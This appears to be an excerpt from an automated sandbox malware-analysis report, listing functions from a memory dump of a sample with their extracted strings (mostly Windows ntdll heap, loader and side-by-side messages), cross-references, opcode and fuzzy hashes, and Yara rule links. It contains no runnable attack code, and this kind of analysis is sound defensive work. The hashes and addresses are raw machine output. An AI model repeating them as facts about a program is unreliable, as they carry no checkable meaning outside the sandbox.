HEAP: , xrefs: 00F51706, 00F51756, 00F517A8, 00F51809, 00F5184D, 00F51895, 00F518E6
Heap block at %p has incorrect segment offset (%x), xrefs: 00F5181A
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 00F5176D
HEAP[%wZ]: , xrefs: 00F516CD, 00F516F9, 00F51749, 00F5179B, 00F517FC, 00F51840, 00F518D9
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 00F5186B
Heap block at %p is not last block in segment (%p), xrefs: 00F517B7

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 3b51111261dc842bc04748941c027cd071e2ade0b2292b479dbc3781a3460a4f
Instruction ID: 0369ce96fbf2c42ef12cd7ce028a011a9f2094bb3af040d1f28fdd08617fa5eb
Opcode Fuzzy Hash: 3b51111261dc842bc04748941c027cd071e2ade0b2292b479dbc3781a3460a4f
Instruction Fuzzy Hash: 59129C31A00641DFDB25CF28C481BB6BBE1FF09716F188459E9869B692D734FC89EB50

Function 00EBAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

LdrpInitializeDllPath, xrefs: 00F080AD
minkernel\ntdll\ldrapi.c, xrefs: 00F08086, 00F083BC
DLL name: %wZ, xrefs: 00F08075
minkernel\ntdll\ldrutil.c, xrefs: 00F080B7
LdrpFindLoadedDllInternal, xrefs: 00F082D7
DLL search path passed in externally: %ws, xrefs: 00F080A6
Status: 0x%08lx, xrefs: 00F082D0, 00F083AB
minkernel\ntdll\ldrfind.c, xrefs: 00F082E1
LdrGetDllHandleEx, xrefs: 00F0807C, 00F083B2

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: 3ce7bbd96e55e65005c0237c1f784dac7ccf540acbc1a0927ba7f33f51f1dbe6
Instruction ID: 2ba884c0c6a4c6fac10b442d8853c37f94ba07434512132670570b1d85ff91a8
Opcode Fuzzy Hash: 3ce7bbd96e55e65005c0237c1f784dac7ccf540acbc1a0927ba7f33f51f1dbe6
Instruction Fuzzy Hash: FA12EF71A083518BD724DF28C841BFBB3E0AF84758F08152EF9C5AB291EB74D945DB52

Function 00EAADE0 Relevance: 10.6, Strings: 8, Instructions: 573COMMON

Download Yara Rule

Strings

\U, xrefs: 00EAADF7
\U, xrefs: 00EAAE39
LdrpResSearchResourceMappedFile Enter, xrefs: 00EAAEB8
H, xrefs: 00EAAEC2
#, xrefs: 00F0363D
MUI, xrefs: 00EAB410
J, xrefs: 00EAAEAE
LdrpResSearchResourceMappedFile Exit, xrefs: 00EAAECC

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$\U$\U
API String ID: 0-796227336
Opcode ID: 2791ac7fb9bb1c8e57bf90035ee8953f9c67fe5d4673017b9999ebafdda47abf
Instruction ID: bad03a33ba5c8080625fe70babdb8778b00c2d76aa304e35fc2d56fb61d2b8f7
Opcode Fuzzy Hash: 2791ac7fb9bb1c8e57bf90035ee8953f9c67fe5d4673017b9999ebafdda47abf
Instruction Fuzzy Hash: 9132B071E002698BDB21CB14CC94BEEB7B9AF4A344F1450EAE449BB252D771AF81DF40

Function 00F50CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON

Download Yara Rule

Strings

Non-Dedicated free list element %p is out of order, xrefs: 00F50E6D
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 00F51192
dedicated (%04Ix) free list element %p is marked busy, xrefs: 00F50ED1
HEAP: , xrefs: 00F50E61, 00F50EC2, 00F50FD5, 00F5105E, 00F51124, 00F51178
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 00F5106F
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 00F50FE4
HEAP[%wZ]: , xrefs: 00F50E54, 00F50EB5, 00F50FC8, 00F51051, 00F51117, 00F5116B
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 00F5113D

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: 7290d71011f260fb9836b900396794f8da065ada595503674ac57ac29680ebce
Instruction ID: bcee040daf26943d661575f9907a6b4519ca75e00dc89d2dfbfb711eebd2a682
Opcode Fuzzy Hash: 7290d71011f260fb9836b900396794f8da065ada595503674ac57ac29680ebce
Instruction Fuzzy Hash: BCF11631A00685EFCF25CF64C481BAAB7F4FF09711F148459EA8597292CB74BD89EB50

Function 00F50274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 00F503BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 00F5069F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 00F504D3
RtlReAllocateHeap, xrefs: 00F502BF, 00F50362
HEAP: , xrefs: 00F503A6, 00F504B5, 00F505DD, 00F50682, 00F506D9
HEAP[%wZ]: , xrefs: 00F50399, 00F504A8, 00F505D0, 00F50675, 00F506CC
Just reallocated block at %p to %Ix bytes, xrefs: 00F505F1
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 00F506EA

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: c3f4bdfb95a8ad2d7991646f1ea44c0cb93c217907686cab77122c98d2de9b28
Instruction ID: b175e09cb9b7b74ac43352401c7abc455c9a1762da64410a72bba7f7c38eeb61
Opcode Fuzzy Hash: c3f4bdfb95a8ad2d7991646f1ea44c0cb93c217907686cab77122c98d2de9b28
Instruction Fuzzy Hash: F6D11431900689DFCF11DF68C441AADBBF1FF49711F08805AEA45AB262DB34ED89EB51

Function 00EAEA80 Relevance: 9.8, Strings: 7, Instructions: 1073COMMON

Download Yara Rule

Strings

`V, xrefs: 00EAF5BF, 00EAF67A
T, xrefs: 00EAEB4E
R, xrefs: 00EAEB62
{, xrefs: 00F04643
, xrefs: 00EAF299
LdrpResSearchResourceInsideDirectory Enter, xrefs: 00EAEB58
LdrpResSearchResourceInsideDirectory Exit, xrefs: 00EAEB6C

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`V${
API String ID: 0-2184846227
Opcode ID: 83be7207ee46820dac7845198bad563beb0cde60a1df09053542dba34081695f
Instruction ID: e1073456bb6e775586fdd59485545bf06d588a89d9329c5162073fc77a805491
Opcode Fuzzy Hash: 83be7207ee46820dac7845198bad563beb0cde60a1df09053542dba34081695f
Instruction Fuzzy Hash: DDA24B74E056298FDB64DF54CC887A9B7B1AF49314F2442E9D90DAB391DB30AE81EF40

Function 00F289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

HandleTraces, xrefs: 00F28C8F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00F28A67
VerifierDebug, xrefs: 00F28CA5
VerifierFlags, xrefs: 00F28C50
VerifierDlls, xrefs: 00F28CBD
AVRF: -*- final list of providers -*- , xrefs: 00F28B8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00F28A3D

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 91daa0faeece47865b830fd6f081da566abaffa5591e7682f9550667f1178747
Instruction ID: 1c1cc10318680218fcc787cc269fd505a81131d60edfff6b1148075157da2c8c
Opcode Fuzzy Hash: 91daa0faeece47865b830fd6f081da566abaffa5591e7682f9550667f1178747
Instruction Fuzzy Hash: 07916872A46725AFD712EF28EC81B1A73E4EB84B50F05045EF9447B291CB74DC06EB91

Function 00E9F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(!TrailingUCR), xrefs: 00EFE3A9
((LONG)FreeEntry->Size > 1), xrefs: 00EFE0B3
HEAP: , xrefs: 00EFDF64, 00EFE0A8, 00EFE286, 00EFE39E
(UCRBlock != NULL), xrefs: 00EFDF6F
HEAP[%wZ]: , xrefs: 00EFDF57, 00EFE09B, 00EFE279, 00EFE391
(LONG)FreeEntry->Size > 1, xrefs: 00EFE291

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: e8e8f62eb812410192ffff4064b56f32b5d040de77869cd184e5e4b8f7a4fbfb
Instruction ID: 9fc781aa6963ebdb49169d76a696f3e6d3cc1da1a8542bbd75bbdafe2866a077
Opcode Fuzzy Hash: e8e8f62eb812410192ffff4064b56f32b5d040de77869cd184e5e4b8f7a4fbfb
Instruction Fuzzy Hash: 7942EE312083859FCB15DF28C884B6ABBE5FF84708F146969F986EB362D734E941CB51

Function 00EBB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrutil.c, xrefs: 00F0840D, 00F084E1
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 00F084D0
API set, xrefs: 00F083F4, 00F083F9
DLL %wZ was redirected to %wZ by %s, xrefs: 00F083FC
SxS, xrefs: 00F083ED
LdrpPreprocessDllName, xrefs: 00F08403, 00F084D7

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: a6c8905c268fbab58760c677901bdc95f13c0e1d62df3115f40576c3e1556525
Instruction ID: 84ee5e562c80112db218b2cb782c6f9446592e2657b66020eef1936f27f7fce6
Opcode Fuzzy Hash: a6c8905c268fbab58760c677901bdc95f13c0e1d62df3115f40576c3e1556525
Instruction Fuzzy Hash: A5C16731A042159BCB248B64C881BFFB7A5AF45314F246069E846BB2D2EBF09C45E391

Function 00ED63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 00F141FE
minkernel\ntdll\ldrinit.c, xrefs: 00F140E9, 00F1414B, 00F1420F, 00F14269
_LdrpInitialize, xrefs: 00F140DF, 00F14141, 00F14205, 00F1425F
Process initialization failed with status 0x%08lx, xrefs: 00F1413A
Delaying execution failed with status 0x%08lx, xrefs: 00F14258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 00F140D8

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: a476daeb23f53a68fbc1a863eb0a6fb264810076603f55bc209e5cf0d3f72c7b
Instruction ID: 4c3cfbbb5c258049d1957a2fc04ba8c04ca63c37a7b2e5a7e5087397cccecacd
Opcode Fuzzy Hash: a476daeb23f53a68fbc1a863eb0a6fb264810076603f55bc209e5cf0d3f72c7b
Instruction Fuzzy Hash: 8D912370A007589BDB25DF54DC45BEA37A0FF81B28F14112AE914BB3D1DBB4A882E791

Function 00ED2CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON

Download Yara Rule

Strings

.Local\, xrefs: 00ED2D91
\WinSxS\, xrefs: 00ED2E23
SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 00F12706
@, xrefs: 00ED2E4D
SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 00F1279C
SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 00F1276F

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
API String ID: 0-3926108909
Opcode ID: 73bbc0f65d8247bef9140d5855e1df112f982902b1e39e5bb621c8de9956ff5e
Instruction ID: f4f0ca2e4149585b1db118e58af3ea6bf232eadf0e2f481b758d25737ead118f
Opcode Fuzzy Hash: 73bbc0f65d8247bef9140d5855e1df112f982902b1e39e5bb621c8de9956ff5e
Instruction Fuzzy Hash: 7781CA715043419FDB11CF29C890AABB7E9EF95704F24985EF988EB382D371D944CBA2

Function 00E9645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 00EF9A11, 00EF9A3A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 00EF9A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00EF9A2A
apphelp.dll, xrefs: 00E96496
LdrpInitShimEngine, xrefs: 00EF99F4, 00EF9A07, 00EF9A30
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00EF99ED

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 33d0be64d13ac104d8f9aba5070851d891f59daf337fdb71dd267c0123687fad
Instruction ID: 24bf03b0f398061b39f1a44e93d0383ed3bc64456bb576140165aa8adfc9387c
Opcode Fuzzy Hash: 33d0be64d13ac104d8f9aba5070851d891f59daf337fdb71dd267c0123687fad
Instruction Fuzzy Hash: 985191712087089FD725DF24D842BAB77E4EF84744F10691EF689B72A1E730E944DB92

Function 00EDC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 00EDC6C3
Loading import redirection DLL: '%wZ', xrefs: 00F18170
minkernel\ntdll\ldrredirect.c, xrefs: 00F18181, 00F181F5
LdrpInitializeImportRedirection, xrefs: 00F18177, 00F181EB
LdrpInitializeProcess, xrefs: 00EDC6C4
Unable to build import redirection Table, Status = 0x%x, xrefs: 00F181E5

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: aeced4763d23c0f6043ede97e7130f1d1544f11b1194b85c21a9b2c7c8b9d129
Instruction ID: 3de0e140ec3194f095f062f2b35a1b900bbc1394ea7a06e8e0a86f796ca219b8
Opcode Fuzzy Hash: aeced4763d23c0f6043ede97e7130f1d1544f11b1194b85c21a9b2c7c8b9d129
Instruction Fuzzy Hash: 373137B2644345AFC214EF28DD46E1A77D0EF80F64F001559F884BB392EA20ED06D7A2

Function 00ED2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00F121BF
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00F12178
RtlGetAssemblyStorageRoot, xrefs: 00F12160, 00F1219A, 00F121BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00F1219F
SXS: %s() passed the empty activation context, xrefs: 00F12165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00F12180

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 0f5e03019c9f8ad5afa189c4629548cabaf73815ffdf7318046fbb0db42a210d
Instruction ID: ea81a65133b638db4fefe8e875023e4cf916e1086139c7ca1f7519e0dcb050b4
Opcode Fuzzy Hash: 0f5e03019c9f8ad5afa189c4629548cabaf73815ffdf7318046fbb0db42a210d
Instruction Fuzzy Hash: 92313732F00320B7E720DA958C85F9E7678DF65B50F15506ABB0877281D270DE51D3A0

Function 00EB9950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON

Download Yara Rule

Strings

Internal error check failed, xrefs: 00F076B2
, xrefs: 00EB99F9
, xrefs: 00EB99F1
Status != STATUS_SXS_SECTION_NOT_FOUND, xrefs: 00F076A3
minkernel\ntdll\sxsisol.cpp, xrefs: 00F076AD

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
API String ID: 0-3393094623
Opcode ID: 4f05929dcab701521dc3e4e13b0b7660b88eef97ba6989d4d3f42e95d67ae41e
Instruction ID: 569f6ad59cd1817bdca5e87ce0b261067081452996d2df4aa9a6326052e93de9
Opcode Fuzzy Hash: 4f05929dcab701521dc3e4e13b0b7660b88eef97ba6989d4d3f42e95d67ae41e
Instruction Fuzzy Hash: 3E027B71908351CFC720CF64C4807EBBBE4BF89714F54991EEA99AB252E770D844DB92

Function 00EE096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 00EE2DF0: LdrInitializeThunk.NTDLL ref: 00EE2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE0D74

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 333192cb142f949dd69b0014c6fc528d483f52f9c7b3261fba52613babf654de
Instruction ID: f9ec19786ef6f3483093063ecc8b0e743dfcb5c980297cc579fa0eb65412e9c1
Opcode Fuzzy Hash: 333192cb142f949dd69b0014c6fc528d483f52f9c7b3261fba52613babf654de
Instruction Fuzzy Hash: D6426B71900759DFDB20CF65C891BEAB7F4FF44314F1445A9E989AB242D7B0AA84CFA0

Function 00F24F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON

Download Yara Rule

Strings

/, xrefs: 00F24F6D
.Local, xrefs: 00F25170
\, xrefs: 00F24F66
\microsoft.system.package.metadata\Application, xrefs: 00F25158
.DLL, xrefs: 00F250C7, 00F2519C

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
API String ID: 0-2518169356
Opcode ID: f6e10cb0d0caa3bc2405d5fddb4e998d68fc4af130606b2402a38030eb4eea61
Instruction ID: 53cedb1238e6b1e444b325b424250dcb081516d81a943945c89eb10535b9b8a2
Opcode Fuzzy Hash: f6e10cb0d0caa3bc2405d5fddb4e998d68fc4af130606b2402a38030eb4eea61
Instruction Fuzzy Hash: 3991C272D00A2A9BCB21CF58D881ABEB7B0FF88720F554169E815EB350D775ED01DB90

Function 00EB70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00EB7C96, 00EB8696
HEAP: , xrefs: 00EB7C7C, 00EB867F
HEAP[%wZ]: , xrefs: 00EB7C6D, 00EB8670

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 3cad61c9a1d3353e1a9e1dc8eb4f282257cbd9f7139cfc4656f0b9865724f35f
Instruction ID: 3a10a3f5a66ec4fdbe724a0317bfe7f50c5237ba29f5db62bcf63f3d9bb68efa
Opcode Fuzzy Hash: 3cad61c9a1d3353e1a9e1dc8eb4f282257cbd9f7139cfc4656f0b9865724f35f
Instruction Fuzzy Hash: EA139F70A04655CFDB29CF68C5807EABBF5BF48304F2491A9D889AB781DB34AD45CF90

Function 00EBA840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON

Download Yara Rule

Strings

SsHd, xrefs: 00EBA885
SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 00F07D56
RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 00F07D03
SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 00F07D39

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
API String ID: 0-2905229100
Opcode ID: 4a38c80d5e0fdbb98b3e82070c036deaf37e7462f6e7b8fb0c313d34cd53b5f1
Instruction ID: 7db8d566c2a3f059e80f9c99f9fc8056299119262da29cdaae11ac5ab4c31fae
Opcode Fuzzy Hash: 4a38c80d5e0fdbb98b3e82070c036deaf37e7462f6e7b8fb0c313d34cd53b5f1
Instruction Fuzzy Hash: C3D19E71E00219DBCF24DF98D9C0AEEB7B1EF48314F19506AE845BB251D331AC81EBA1

Function 00EAA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 00EAA3EF
LdrResFallbackLangList Exit, xrefs: 00EAA3FF
6, xrefs: 00EAA3F7
8, xrefs: 00EAA3E7

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 6431e808066109b765b57867dcec5cc70b2d871fc7705b207a972edd04499e6c
Instruction ID: 9a921a42745183a7fa3ab9f7143a71ab545a64cdc01715db7b99b0f417533ec7
Opcode Fuzzy Hash: 6431e808066109b765b57867dcec5cc70b2d871fc7705b207a972edd04499e6c
Instruction Fuzzy Hash: 79C1BF70508382CFD721CF14C044BAAB7E4FF8A314F089869F895AB291E774E949DB67

Function 00ED8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 00ED8421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00ED855E
@, xrefs: 00ED8591
LdrpInitializeProcess, xrefs: 00ED8422

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 0227c8c51fd34425b19244964aee5bf4f24454f4bec5c97d225ea236069248c5
